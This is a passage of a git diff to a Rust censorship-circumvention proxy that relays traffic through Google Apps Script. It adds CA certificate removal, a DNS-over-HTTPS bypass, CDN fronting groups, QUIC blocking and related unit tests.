= split_response(&rewritten).unwrap(); + assert_eq!(status, 200); + assert_eq!(body.len(), 45_812); + assert!(!headers + .iter() + .any(|(k, _)| k.eq_ignore_ascii_case("content-range"))); + assert_eq!( + headers + .iter() + .find(|(k, _)| k.eq_ignore_ascii_case("content-length")) + .map(|(_, v)| v.as_str()), + Some("45812"), + ); + } + + #[test] + fn 
validate_probe_range_rejects_missing_content_range() { + assert!(validate_probe_range(206, &[], b"hello", 4).is_none()); + } + + #[test] + fn validate_probe_range_rejects_nonzero_start() { + let headers = vec![("Content-Range".to_string(), "bytes 1-4/20".to_string())]; + assert!(validate_probe_range(206, &headers, b"hell", 4).is_none()); + } + + #[test] + fn validate_probe_range_rejects_end_past_requested_end() { + let headers = vec![("Content-Range".to_string(), "bytes 0-5/20".to_string())]; + assert!(validate_probe_range(206, &headers, b"hello!", 4).is_none()); + } + #[test] fn validate_probe_range_rejects_body_length_mismatch() { let headers = vec![("Content-Range".to_string(), "bytes 0-4/20".to_string())]; @@ -2444,6 +2837,16 @@ mod tests { assert_eq!(checked_stitched_range_capacity(u64::MAX), None); } + #[test] + fn extract_exact_range_body_rejects_body_length_mismatch() { + let raw = b"HTTP/1.1 206 Partial Content\r\n\ +Content-Range: bytes 5-9/20\r\n\ +Content-Length: 3\r\n\r\n\ +hey"; + let err = extract_exact_range_body(raw, 5, 9, 20).unwrap_err(); + assert_eq!(err, "Content-Range/body length mismatch"); + } + #[test] fn extract_exact_range_body_rejects_mismatched_content_range() { let raw = b"HTTP/1.1 206 Partial Content\r\n\ @@ -2476,6 +2879,9 @@ hello"; assert!(!should_blacklist(200, "")); assert!(!should_blacklist(502, "bad gateway")); assert!(looks_like_quota_error("Exception: Service invoked too many times per day")); + assert!(looks_like_quota_error( + "Exception: Bandbreitenkontingent überschritten: https://example.com. Verringern Sie die Datenübertragungsrate." 
+ )); assert!(!looks_like_quota_error("bad url")); } diff --git a/src/main.rs b/src/main.rs index 92bf7f46..202c7ec5 100644 --- a/src/main.rs +++ b/src/main.rs @@ -7,7 +7,7 @@ use std::sync::Arc; use tokio::sync::Mutex; use tracing_subscriber::EnvFilter; -use mhrv_rs::cert_installer::{install_ca, is_ca_trusted}; +use mhrv_rs::cert_installer::{install_ca, is_ca_trusted, reconcile_sudo_environment, remove_ca}; use mhrv_rs::config::Config; use mhrv_rs::mitm::{MitmCertManager, CA_CERT_FILE}; use mhrv_rs::proxy_server::ProxyServer; @@ -18,6 +18,7 @@ const VERSION: &str = env!("CARGO_PKG_VERSION"); struct Args { config_path: Option, install_cert: bool, + remove_cert: bool, no_cert_check: bool, command: Command, } @@ -44,6 +45,11 @@ USAGE: OPTIONS: -c, --config PATH Path to config.json (default: ./config.json) --install-cert Install the MITM CA certificate and exit + --remove-cert Remove the MITM CA from the OS trust store (verified by + name), then delete the on-disk ca/ directory and exit. + NSS cleanup (Firefox/Chrome) is best-effort. A fresh CA + is generated on next run. config.json and your Apps + Script deployment are untouched. 
--no-cert-check Skip the auto-install-if-untrusted check on startup -h, --help Show this message -V, --version Show version @@ -58,6 +64,7 @@ ENV: fn parse_args() -> Result { let mut config_path: Option = None; let mut install_cert = false; + let mut remove_cert = false; let mut no_cert_check = false; let mut command = Command::Serve; @@ -102,13 +109,18 @@ fn parse_args() -> Result { config_path = Some(PathBuf::from(v)); } "--install-cert" => install_cert = true, + "--remove-cert" => remove_cert = true, "--no-cert-check" => no_cert_check = true, other => return Err(format!("unknown argument: {}", other)), } } + if install_cert && remove_cert { + return Err("--install-cert and --remove-cert cannot be combined".into()); + } Ok(Args { config_path, install_cert, + remove_cert, no_cert_check, command, }) @@ -127,6 +139,14 @@ async fn main() -> ExitCode { // Install default rustls crypto provider (ring). let _ = rustls::crypto::ring::default_provider().install_default(); + // Must run before anything else reads HOME / USER / data_dir — if + // the user ran `sudo ./mhrv-rs ...`, this re-points HOME at the + // invoking user's home so user-scoped cert paths (Firefox profiles, + // macOS login keychain, the mhrv-rs data dir) are not silently + // operated against root's home. No-op on Windows and for non-sudo + // invocations. + reconcile_sudo_environment(); + let args = match parse_args() { Ok(a) => a, Err(e) => { @@ -136,6 +156,29 @@ async fn main() -> ExitCode { } }; + // --remove-cert runs without a valid config — the CA files may be + // the only thing present in the data dir. `config.json` and the + // Apps Script deployment are intentionally untouched: the user does + // not have to redeploy Code.gs after regenerating the CA. 
+ if args.remove_cert { + init_logging("info"); + let base = mhrv_rs::data_dir::data_dir(); + match remove_ca(&base) { + Ok(outcome) => { + tracing::info!("{}", outcome.summary()); + tracing::info!( + "A fresh CA will be generated next time the proxy starts — \ + run --install-cert then to re-trust it." + ); + return ExitCode::SUCCESS; + } + Err(e) => { + eprintln!("remove failed: {}", e); + return ExitCode::FAILURE; + } + } + } + // --install-cert can run without a valid config — only needs the CA file. if args.install_cert { init_logging("info"); @@ -245,11 +288,12 @@ async fn main() -> ExitCode { tracing::info!("Script ID: {}", sids[0]); } } - mhrv_rs::config::Mode::GoogleOnly => { + mhrv_rs::config::Mode::Direct => { tracing::warn!( - "google_only bootstrap: direct SNI-rewrite tunnel to {} only. \ - Open https://script.google.com in your browser (proxy set to \ - {}:{}), deploy Code.gs, then switch to apps_script mode.", + "direct mode: SNI-rewrite tunnel only (Google edge {} + any \ + configured fronting_groups). 
Open https://script.google.com \ + in your browser (proxy set to {}:{}), deploy Code.gs, then \ + switch to apps_script mode for full DPI bypass.", config.google_ip, config.listen_host, config.listen_port diff --git a/src/proxy_server.rs b/src/proxy_server.rs index 41063057..06ed7feb 100644 --- a/src/proxy_server.rs +++ b/src/proxy_server.rs @@ -15,7 +15,7 @@ use tokio_rustls::rustls::server::Acceptor; use tokio_rustls::rustls::{ClientConfig, DigitallySignedStruct, SignatureScheme}; use tokio_rustls::{LazyConfigAcceptor, TlsAcceptor, TlsConnector}; -use crate::config::{Config, Mode}; +use crate::config::{Config, FrontingGroup, Mode}; use crate::domain_fronter::DomainFronter; use crate::mitm::MitmCertManager; use crate::tunnel_client::{decode_udp_packets, TunnelMux}; @@ -47,6 +47,18 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[ "youtu.be", "youtube-nocookie.com", "ytimg.com", + // NOTE on `googlevideo.com`: v1.7.4 (#275) added this here on the + // theory that video chunks should bypass the Apps Script relay. + // **Reverted in v1.7.6** — multiple users (#275 amirabbas117, #281 + // mrerf) reported total YouTube breakage after v1.7.4. Root cause + // is that googlevideo.com is served by Google's separate "EVA" + // edge IPs, not the regular GFE IPs that the user's `google_ip` + // typically points at. SNI-rewriting `googlevideo.com:443` to a + // GFE IP got TLS handshake / wrong-cert errors for those users. + // Pre-v1.7.4 behaviour (chunks via the Apps Script relay path — + // slow but reliable on every GFE IP) is restored. If we ever want + // direct googlevideo.com routing, it needs a separate config knob + // that lets users specify their EVA edge IP independently. // Google Video Transport CDN — YouTube video chunks, Chrome // auto-updates, Google Play Store downloads. The single biggest // gap vs the upstream Python port: without these in the list @@ -72,27 +84,100 @@ const SNI_REWRITE_SUFFIXES: &[&str] = &[ "blogger.com", ]; -/// YouTube-family suffixes. 
Extracted so `youtube_via_relay` config can -/// pull them out of the SNI-rewrite dispatch at runtime. -const YOUTUBE_SNI_SUFFIXES: &[&str] = &[ +/// YouTube hosts that should be routed through the Apps Script relay +/// when `youtube_via_relay` is enabled — the API + HTML surfaces where +/// Restricted Mode is actually enforced (via the SNI=www.google.com +/// edge looking at the request). Issue #102 / #275. +/// +/// Deliberately narrower than the YouTube section of +/// `SNI_REWRITE_SUFFIXES`: +/// - `youtube.com` / `youtu.be` / `youtube-nocookie.com`: HTML pages +/// and player frames. These trigger Restricted Mode if served via +/// the SNI rewrite, so when the flag is on we relay them. +/// - `youtubei.googleapis.com`: the YouTube data API the player +/// queries for video metadata + manifest. Restricted Mode also +/// gates video availability here. Without this entry, the JSON +/// RPC layer would still hit the SNI-rewrite tunnel via the +/// broader `googleapis.com` suffix — the user-visible symptom of +/// that miss is "youtube_via_relay flips on but Restricted Mode +/// stays sticky on some videos." +/// +/// **NOT** in this list (intentional, was a regression in #275): +/// - `ytimg.com`: thumbnails. No Restricted Mode logic on a static +/// image CDN; routing through Apps Script makes thumbnails slow +/// for zero gain. +/// - `googlevideo.com`: video chunk CDN. Routing through Apps Script +/// means every chunk eats Apps Script quota *and* risks the 6-min +/// execution cap aborting long videos mid-playback. +/// - `ggpht.com`: channel/profile images, same reasoning as ytimg. +const YOUTUBE_RELAY_HOSTS: &[&str] = &[ "youtube.com", "youtu.be", "youtube-nocookie.com", - "ytimg.com", + "youtubei.googleapis.com", +]; + +/// Built-in list of DNS-over-HTTPS endpoints. CONNECTs to these (when +/// `tunnel_doh` is left at the default of `false`, i.e. bypass enabled) +/// skip the Apps Script tunnel and exit via plain TCP. 
Mix of the +/// browser-pinned variants Chrome/Brave/Edge/Firefox/Safari use and the +/// well-known public DoH providers users wire up by hand. Suffix +/// matching means we don't need to enumerate every tenant subdomain +/// (e.g. `*.cloudflare-dns.com` covers Workers-hosted DoH too). +/// +/// Entries are matched case-insensitively. Both exact-match (`dns.google`) +/// and dot-anchored suffix-match (a host whose suffix is `.cloudflare-dns.com` +/// or which equals `cloudflare-dns.com`) are accepted — same shape as +/// `passthrough_hosts`'s `.foo` rule. +const DEFAULT_DOH_HOSTS: &[&str] = &[ + // The base SLD covers every tenant subdomain via suffix matching; + // the browser-pinned variants below are listed for grep/discovery + // (so a user searching "chrome.cloudflare-dns.com" finds this list) + // and are technically redundant under cloudflare-dns.com. + "cloudflare-dns.com", + "chrome.cloudflare-dns.com", + "mozilla.cloudflare-dns.com", + "1dot1dot1dot1.cloudflare-dns.com", + "dns.google", + "dns.google.com", + "dns.quad9.net", + "dns11.quad9.net", + "dns.adguard-dns.com", + "unfiltered.adguard-dns.com", + "family.adguard-dns.com", + "dns.nextdns.io", + "doh.opendns.com", + "doh.cleanbrowsing.org", + "doh.dns.sb", + "dns0.eu", + "dns.alidns.com", + "doh.pub", + "dns.mullvad.net", ]; fn matches_sni_rewrite(host: &str, youtube_via_relay: bool) -> bool { let h = host.to_ascii_lowercase(); let h = h.trim_end_matches('.'); + + // YouTube relay carve-out runs FIRST so it wins over the broad + // `googleapis.com` suffix that would otherwise pull + // `youtubei.googleapis.com` into the SNI-rewrite path. The earlier + // implementation iterated SNI_REWRITE_SUFFIXES with a filter, which + // works for sibling entries (e.g. `youtube.com` in both lists) but + // not for nested ones (`youtubei.googleapis.com` matches the broad + // `googleapis.com` even when its specific entry is filtered out). 
+ // The short-circuit here is unconditional — we don't need to check
+ // SNI rewrite once we've decided this host goes to the relay.
+ if youtube_via_relay {
+ for s in YOUTUBE_RELAY_HOSTS {
+ if h == *s || h.ends_with(&format!(".{}", s)) {
+ return false;
+ }
+ }
+ }
+
 SNI_REWRITE_SUFFIXES
 .iter()
- .filter(|s| {
- // If the user opted into youtube_via_relay, skip YouTube
- // suffixes so they fall through to the Apps Script relay
- // path. See config.rs `youtube_via_relay` docs for the
- // trade-off. Issue #102.
- !(youtube_via_relay && YOUTUBE_SNI_SUFFIXES.contains(s))
- })
 .any(|s| h == *s || h.ends_with(&format!(".{}", s)))
 }
@@ -125,12 +210,15 @@ pub struct ProxyServer {
 host: String,
 port: u16,
 socks5_port: u16,
- /// `None` in `google_only` (bootstrap) mode: no Apps Script relay is
- /// wired up, only the SNI-rewrite tunnel path is live.
+ /// `None` in `direct` mode: no Apps Script relay is wired up,
+ /// only the SNI-rewrite tunnel path (Google edge + any configured
+ /// `fronting_groups`) is live.
 fronter: Option>,
 mitm: Arc>,
 rewrite_ctx: Arc,
 tunnel_mux: Option>,
+ coalesce_step_ms: u64,
+ coalesce_max_ms: u64,
 }
 
 pub struct RewriteCtx {
@@ -148,6 +236,142 @@ pub struct RewriteCtx {
 /// and pass through as plain TCP (optionally via upstream_socks5).
 /// See config.rs `passthrough_hosts` for matching rules. Issues #39, #127.
 pub passthrough_hosts: Vec,
+ /// If true, drop SOCKS5 UDP datagrams destined for port 443 so
+ /// callers fall back to TCP/HTTPS. See config.rs `block_quic` for
+ /// the trade-off. Issue #213.
+ pub block_quic: bool,
+ /// If true, route DoH CONNECTs around the Apps Script tunnel via
+ /// plain TCP. Defaults to true via `Config::tunnel_doh = false`
+ /// (default flipped in v1.9.0, issue #468). See `DEFAULT_DOH_HOSTS`
+ /// and `matches_doh_host` for matching, and config.rs `tunnel_doh`
+ /// for the trade-off.
+ pub bypass_doh: bool,
+ /// User-supplied DoH hostnames added to the built-in default list.
+ /// Same matching semantics as `passthrough_hosts`. + pub bypass_doh_hosts: Vec, + /// Multi-edge fronting groups, resolved at startup. Each group's + /// `ServerName` is parsed once so the per-connection dial path + /// is allocation-free. Wrapped in `Arc` so a per-CONNECT match + /// can hand the dispatcher a refcount-clone instead of cloning + /// the whole struct (which holds a `Vec` of normalized + /// domains used only for matching). Empty = feature off (only + /// the built-in Google edge SNI-rewrite is active). + pub fronting_groups: Vec>, +} + +/// True if `host` matches a known DoH endpoint — either the built-in +/// `DEFAULT_DOH_HOSTS` list or a user-supplied entry in `extra`. Match +/// is case-insensitive, and entries match either exactly OR as a +/// dot-anchored suffix unconditionally (no leading-dot requirement, +/// unlike `passthrough_hosts`). The DoH list is *always* about a +/// service — every legitimate tenant subdomain of `cloudflare-dns.com` +/// or a user's private `doh.acme.test` is a DoH endpoint, so requiring +/// users to remember to write `.doh.acme.test` would be a footgun +/// without an obvious benefit. 
+fn host_matches_doh_entry(h: &str, entry: &str) -> bool { + let e = entry.trim().trim_end_matches('.').to_ascii_lowercase(); + let e = e.strip_prefix('.').unwrap_or(&e); + if e.is_empty() { + return false; + } + h == e || h.ends_with(&format!(".{}", e)) +} + +pub fn matches_doh_host(host: &str, extra: &[String]) -> bool { + let h = host.to_ascii_lowercase(); + let h = h.trim_end_matches('.'); + if h.is_empty() { + return false; + } + if DEFAULT_DOH_HOSTS + .iter() + .any(|s| host_matches_doh_entry(h, s)) + { + return true; + } + extra.iter().any(|s| host_matches_doh_entry(h, s)) +} + +/// A `FrontingGroup` after one-time validation: the group's `sni` is +/// parsed into a `ServerName` so we don't repay that on every dialed +/// connection, and domain entries are pre-lower-cased + dot-trimmed +/// so the per-request match path is just byte comparisons. +#[derive(Debug, Clone)] +pub struct FrontingGroupResolved { + pub name: String, + pub ip: String, + pub sni: String, + pub server_name: ServerName<'static>, + domains_normalized: Vec, +} + +impl FrontingGroupResolved { + fn from_config(g: &FrontingGroup) -> Result { + let server_name = ServerName::try_from(g.sni.clone()) + .map_err(|e| format!("invalid sni '{}': {}", g.sni, e))?; + let domains_normalized = g + .domains + .iter() + .map(|d| d.trim().trim_end_matches('.').to_ascii_lowercase()) + .filter(|d| !d.is_empty()) + .collect(); + Ok(Self { + name: g.name.clone(), + ip: g.ip.clone(), + sni: g.sni.clone(), + server_name, + domains_normalized, + }) + } +} + +/// First fronting group whose domain list contains `host`, if any. +/// Match is case-insensitive and unconditionally suffix-anchored: an +/// entry `vercel.com` matches both `vercel.com` and `*.vercel.com`. +/// This is the right shape for fronting because every legitimate +/// subdomain of a fronted domain is itself fronted by the same edge +/// — requiring users to spell out every subdomain would be a footgun. 
+/// Same matching shape as the DoH host list. First match wins, so +/// users can put more-specific groups earlier when entries would +/// otherwise overlap. +pub fn match_fronting_group<'a>( + host: &str, + groups: &'a [Arc], +) -> Option<&'a Arc> { + if groups.is_empty() { + return None; + } + let h = host.to_ascii_lowercase(); + let h = h.trim_end_matches('.'); + if h.is_empty() { + return None; + } + for g in groups { + for d in &g.domains_normalized { + if is_dot_anchored_match(h, d) { + return Some(g); + } + } + } + None +} + +/// True if `host` equals `entry` exactly OR is a strict dot-anchored +/// suffix of it (i.e. `entry == "vercel.com"` matches `host == +/// "app.vercel.com"` but not `host == "xvercel.com"`). Both inputs +/// must already be lowercase + trailing-dot trimmed; the function +/// does no allocation, unlike the obvious `format!(".{}", entry)` +/// implementation that allocates per call. +#[inline] +fn is_dot_anchored_match(host: &str, entry: &str) -> bool { + if host == entry { + return true; + } + let hb = host.as_bytes(); + let eb = entry.as_bytes(); + hb.len() > eb.len() + && hb.ends_with(eb) + && hb[hb.len() - eb.len() - 1] == b'.' } /// True if `host` matches any entry in the user's passthrough list. @@ -181,16 +405,16 @@ impl ProxyServer { .mode_kind() .map_err(|e| std::io::Error::new(std::io::ErrorKind::InvalidInput, format!("{e}")))?; - // `google_only` mode skips the Apps Script relay entirely, so we must + // `direct` mode skips the Apps Script relay entirely, so we must // not try to construct the DomainFronter — it errors on a missing - // `script_id`, which is exactly the state a bootstrapping user is in. + // `script_id`, which is exactly the state a direct-mode user is in. 
let fronter = match mode { Mode::AppsScript | Mode::Full => { let f = DomainFronter::new(config) .map_err(|e| std::io::Error::new(std::io::ErrorKind::Other, format!("{e}")))?; Some(Arc::new(f)) } - Mode::GoogleOnly => None, + Mode::Direct => None, }; let tls_config = if config.verify_ssl { @@ -207,6 +431,68 @@ impl ProxyServer { }; let tls_connector = TlsConnector::from(Arc::new(tls_config)); + // Surface a config combo that is otherwise silently inert: extras + // listed under `bypass_doh_hosts` only take effect when the bypass + // itself is on. A user who set `tunnel_doh: true` *and* populated + // the extras list almost certainly didn't mean to disable the + // feature their custom hosts feed into. + if config.tunnel_doh && !config.bypass_doh_hosts.is_empty() { + tracing::warn!( + "config: bypass_doh_hosts has {} entries but tunnel_doh=true — \ + the bypass is off, so the extras have no effect. Set \ + tunnel_doh=false (or omit it) to use them.", + config.bypass_doh_hosts.len() + ); + } + + // Same-shape warning for fronting_groups in full mode. The dispatch + // short-circuits to the tunnel mux before the fronting_groups check + // (full mode preserves end-to-end TLS, fronting_groups requires + // MITM), so groups configured here will never fire. Surface this + // at startup rather than letting users wonder why their Vercel + // domains never hit the configured edge. + if mode == Mode::Full && !config.fronting_groups.is_empty() { + tracing::warn!( + "config: fronting_groups has {} entries but mode=full — \ + full mode tunnels everything end-to-end through Apps Script \ + (no MITM), so groups never fire. 
Switch to mode=apps_script \ + or mode=direct to use them, or remove the groups to silence \ + this warning.", + config.fronting_groups.len() + ); + } + + let mut fronting_groups: Vec> = + Vec::with_capacity(config.fronting_groups.len()); + let mut seen_names: std::collections::HashSet = Default::default(); + for g in &config.fronting_groups { + let resolved = FrontingGroupResolved::from_config(g).map_err(|e| { + std::io::Error::new( + std::io::ErrorKind::InvalidInput, + format!("fronting_groups['{}']: {}", g.name, e), + ) + })?; + // Surface duplicate group names at startup. Not a hard + // error — copy-pasted configs can land here legitimately + // — but log lines key on `name` and dedup ambiguity makes + // them unreadable. + if !seen_names.insert(resolved.name.clone()) { + tracing::warn!( + "fronting group name '{}' is used by more than one group; \ + log lines that reference the name will be ambiguous", + resolved.name + ); + } + tracing::info!( + "fronting group '{}': sni={} ip={} domains={}", + resolved.name, + resolved.sni, + resolved.ip, + resolved.domains_normalized.len() + ); + fronting_groups.push(Arc::new(resolved)); + } + let rewrite_ctx = Arc::new(RewriteCtx { google_ip: config.google_ip.clone(), front_domain: config.front_domain.clone(), @@ -216,6 +502,10 @@ impl ProxyServer { mode, youtube_via_relay: config.youtube_via_relay, passthrough_hosts: config.passthrough_hosts.clone(), + block_quic: config.block_quic, + bypass_doh: !config.tunnel_doh, + bypass_doh_hosts: config.bypass_doh_hosts.clone(), + fronting_groups, }); let socks5_port = config.socks5_port.unwrap_or(config.listen_port + 1); @@ -228,6 +518,8 @@ impl ProxyServer { mitm, rewrite_ctx, tunnel_mux: None, // initialized in run() inside the tokio runtime + coalesce_step_ms: if config.coalesce_step_ms > 0 { config.coalesce_step_ms as u64 } else { 40 }, + coalesce_max_ms: if config.coalesce_max_ms > 0 { config.coalesce_max_ms as u64 } else { 1000 }, }) } @@ -241,7 +533,7 @@ impl ProxyServer { 
// Initialize TunnelMux inside the runtime (tokio::spawn requires it). if self.rewrite_ctx.mode == Mode::Full { if let Some(f) = self.fronter.as_ref() { - self.tunnel_mux = Some(TunnelMux::start(f.clone())); + self.tunnel_mux = Some(TunnelMux::start(f.clone(), self.coalesce_step_ms, self.coalesce_max_ms)); } } @@ -259,14 +551,44 @@ impl ProxyServer { ); // Pre-warm the outbound connection pool so the user's first request // doesn't pay a fresh TLS handshake to Google edge. Best-effort; - // failures are logged and ignored. Skipped in `google_only` — there - // is no fronter to warm. + // failures are logged and ignored. Skipped in `direct` mode — + // there is no fronter to warm. + // + // Sized to roughly match a browser's parallel-connection burst at + // startup. The previous fixed `3` was fine for a single deployment + // but left requests 4-10 of the opening burst paying a cold TLS + // handshake each (~300ms). Scaling with deployment count gives + // multi-account configs a proportionally warmer pool, capped so + // single-deployment users don't hammer Google edge unnecessarily. if let Some(warm_fronter) = self.fronter.clone() { + let n = warm_fronter.num_scripts().clamp(6, 16); tokio::spawn(async move { - warm_fronter.warm(3).await; + warm_fronter.warm(n).await; }); } + // Apps Script container keepalive. `warm()` above keeps the TCP + // pool warm at startup, but the V8 container behind UrlFetchApp + // goes cold after ~5min idle and costs 1-3s to wake. A periodic + // HEAD ping prevents the cold-start lag on the first request + // after a quiet pause (most visible as YouTube player stalls). + // Skipped in direct mode for the same reason as warm — + // there's no fronter to ping. + // + // The handle is captured (not fire-and-forget) so the shutdown + // arm of the select! below can abort it. 
Without that, hitting + // Stop in the UI would leave the keepalive holding an + // Arc on stale config and pinging Apps Script + // every 240s — same class of bug that issue #99 hit for the + // accept loops. + let keepalive_task = if let Some(keepalive_fronter) = self.fronter.clone() { + tokio::spawn(async move { + keepalive_fronter.run_h1_keepalive().await; + }) + } else { + tokio::spawn(async move { std::future::pending::<()>().await }) + }; + let stats_task = if let Some(stats_fronter) = self.fronter.clone() { tokio::spawn(async move { let mut ticker = tokio::time::interval(std::time::Duration::from_secs(60)); @@ -374,6 +696,7 @@ impl ProxyServer { _ = &mut shutdown_rx => { tracing::info!("Shutdown signal received, stopping listeners"); stats_task.abort(); + keepalive_task.abort(); http_task.abort(); socks_task.abort(); } @@ -447,8 +770,26 @@ async fn handle_http_client( tunnel_mux: Option>, ) -> std::io::Result<()> { let (head, leftover) = match read_http_head(&mut sock).await? { - Some(v) => v, - None => return Ok(()), + HeadReadResult::Got { head, leftover } => (head, leftover), + HeadReadResult::Closed => return Ok(()), + HeadReadResult::Oversized => { + // Reply with 431 instead of just dropping the socket so the + // browser shows a real error rather than retrying the same + // oversized request in a loop. 
+ tracing::warn!( + "request head exceeds {} bytes — refusing with 431", + MAX_HEADER_BYTES + ); + let _ = sock + .write_all( + b"HTTP/1.1 431 Request Header Fields Too Large\r\n\ + Connection: close\r\n\ + Content-Length: 0\r\n\r\n", + ) + .await; + let _ = sock.flush().await; + return Ok(()); + } }; let (method, target, _version, _headers) = parse_request_head(&head) @@ -456,30 +797,41 @@ async fn handle_http_client( if method.eq_ignore_ascii_case("CONNECT") { let (host, port) = parse_host_port(&target); + // Mirror the SOCKS5 short-circuit: if the tunnel-node just failed + // this (host, port) with unreachable, return 502 immediately rather + // than acknowledging the CONNECT and blowing tunnel quota on a + // guaranteed retry. See `TunnelMux::is_unreachable` for context. + if let Some(ref mux) = tunnel_mux { + if mux.is_unreachable(&host, port) { + tracing::info!("CONNECT {}:{} (negative-cached, refusing)", host, port); + let _ = sock + .write_all(b"HTTP/1.1 502 Bad Gateway\r\nContent-Length: 0\r\nConnection: close\r\n\r\n") + .await; + let _ = sock.flush().await; + return Ok(()); + } + } sock.write_all(b"HTTP/1.1 200 Connection Established\r\n\r\n") .await?; sock.flush().await?; dispatch_tunnel(sock, host, port, fronter, mitm, rewrite_ctx, tunnel_mux).await } else { - // Plain HTTP proxy request (e.g. `GET http://…`). The Apps Script - // relay is the only code path that can fulfil this, so in google_only - // bootstrap mode we return a clear 502 instead. + // Plain HTTP proxy request (e.g. `GET http://…`). + // + // apps_script mode: relay through the Apps Script fronter (which + // is the whole point of the relay). + // + // direct mode: no fronter exists, so passthrough as raw TCP. 
+ // Same contract as `dispatch_tunnel` honors for CONNECT in + // direct mode — anything not on the Google edge / not in a + // configured fronting_group is forwarded direct (or via + // `upstream_socks5`) so the user's browser still works while + // they finish setting up Apps Script. Issue: typing a bare + // `http://example.com` URL used to return a 502 here even + // though `https://example.com` (CONNECT) worked fine. match fronter { Some(f) => do_plain_http(sock, &head, &leftover, f).await, - None => { - let _ = sock - .write_all( - b"HTTP/1.1 502 Bad Gateway\r\n\ - Content-Type: text/plain; charset=utf-8\r\n\ - Content-Length: 120\r\n\ - Connection: close\r\n\r\n\ - google_only mode: plain HTTP proxy requests are not supported. \ - Browse https over CONNECT, or switch to apps_script mode.", - ) - .await; - let _ = sock.flush().await; - Ok(()) - } + None => do_plain_http_passthrough(sock, &head, &leftover, &rewrite_ctx).await, } } } @@ -557,6 +909,21 @@ async fn handle_socks5_client( return handle_socks5_udp_associate(sock, rewrite_ctx, tunnel_mux).await; } + // Negative-cache short-circuit: if the tunnel-node just failed to reach + // this exact (host, port) with `Network is unreachable` / `No route to + // host`, reply 0x04 (Host unreachable) immediately. Saves a 1.5–2s tunnel + // round-trip on guaranteed-failing targets — the IPv6 probe retry loop + // is the main offender on devices without IPv6. + if let Some(ref mux) = tunnel_mux { + if mux.is_unreachable(&host, port) { + tracing::info!("SOCKS5 CONNECT -> {}:{} (negative-cached, refusing)", host, port); + sock.write_all(&[0x05, 0x04, 0x00, 0x01, 0, 0, 0, 0, 0, 0]) + .await?; + sock.flush().await?; + return Ok(()); + } + } + tracing::info!("SOCKS5 CONNECT -> {}:{}", host, port); // Success reply with zeroed BND. @@ -784,6 +1151,30 @@ async fn handle_socks5_udp_associate( continue; }; + // Issue #213: client-side QUIC block. 
UDP/443 is + // HTTP/3 — drop the datagram silently so the client + // stack retries a couple of times and then falls back + // to TCP/HTTPS, which goes through the regular CONNECT + // path. Skipping this at the SOCKS5 layer (rather than + // letting it hit the tunnel-node) avoids paying the + // 200–500 ms tunnel-node round-trip per dropped QUIC + // datagram, which would otherwise compound during the + // 1–3 retries before the browser falls back. + // + // Silent drop instead of an explicit error reply: the + // SOCKS5 UDP wire has no "destination unreachable" + // datagram — `0x04` only exists in TCP CONNECT replies + // (RFC 1928 §6). The browser's QUIC stack already has + // a "no response → fall back" timeout, so silent drop + // is the contractually correct shape. + if rewrite_ctx.block_quic && target.port == 443 { + tracing::debug!( + "udp dropped: block_quic=true, target {}:443", + target.host + ); + continue; + } + // RFC 1928 §6: lock to the first VALID datagram's source // port. Subsequent datagrams must come from the same // (ip, port) pair. @@ -1190,6 +1581,28 @@ async fn dispatch_tunnel( return Ok(()); } + // 0.5. DoH bypass. DNS-over-HTTPS is the dominant per-flow DNS cost + // in Full mode (every browser name lookup costs a ~2 s Apps + // Script round-trip), and the tunnel adds no privacy beyond + // what DoH already provides. Route known DoH hosts directly. + // Port-gated to 443 so a non-TLS CONNECT to e.g. `dns.google:80` + // doesn't get diverted off-tunnel by accident. + // See `DEFAULT_DOH_HOSTS` and config.rs `tunnel_doh`. + if rewrite_ctx.bypass_doh + && port == 443 + && matches_doh_host(&host, &rewrite_ctx.bypass_doh_hosts) + { + let via = rewrite_ctx.upstream_socks5.as_deref(); + tracing::info!( + "dispatch {}:{} -> raw-tcp ({}) (doh bypass)", + host, + port, + via.unwrap_or("direct") + ); + plain_tcp_passthrough(sock, &host, port, via).await; + return Ok(()); + } + // 1. 
Full tunnel mode: ALL traffic goes through the batch multiplexer // (Apps Script → tunnel node → real TCP). No MITM, no cert. if rewrite_ctx.mode == Mode::Full { @@ -1209,6 +1622,40 @@ async fn dispatch_tunnel( return Ok(()); } + // 2a. User-configured fronting groups (Vercel, Fastly, etc.). Wins + // over the built-in Google SNI-rewrite suffix list — if a user + // adds e.g. `vercel.com` to a Vercel fronting group, we hit + // Vercel's edge with sni=react.dev rather than trying to resolve + // it through Google's. Port-gated to 443: SNI-rewrite needs a + // real ClientHello and a non-TLS CONNECT to the same hostname + // would just hang. Only HTTPS sites are fronted by these CDNs in + // practice, so the gate has no false negatives we care about. + if port == 443 { + // `Arc::clone` here is refcount-only; we hold it across the + // await below without keeping `rewrite_ctx` borrowed. + let group_match = + match_fronting_group(&host, &rewrite_ctx.fronting_groups).map(Arc::clone); + if let Some(group) = group_match { + tracing::info!( + "dispatch {}:{} -> sni-rewrite tunnel (fronting group '{}', edge {} sni={})", + host, + port, + group.name, + group.ip, + group.sni + ); + return do_sni_rewrite_tunnel_from_tcp( + sock, + &host, + port, + mitm, + rewrite_ctx, + Some(group), + ) + .await; + } + } + // 2. Explicit hosts override or SNI-rewrite suffix: for HTTPS targets, // use the TLS SNI-rewrite tunnel (skipped in full mode above). if should_use_sni_rewrite( @@ -1222,17 +1669,18 @@ async fn dispatch_tunnel( host, port ); - return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx).await; + return do_sni_rewrite_tunnel_from_tcp(sock, &host, port, mitm, rewrite_ctx, None).await; } - // 3. google_only bootstrap: no Apps Script relay exists. Anything that - // isn't SNI-rewrite-matched gets direct TCP passthrough so the user's - // browser still works while they're deploying Code.gs. They'd switch - // to apps_script mode for the real DPI bypass. 
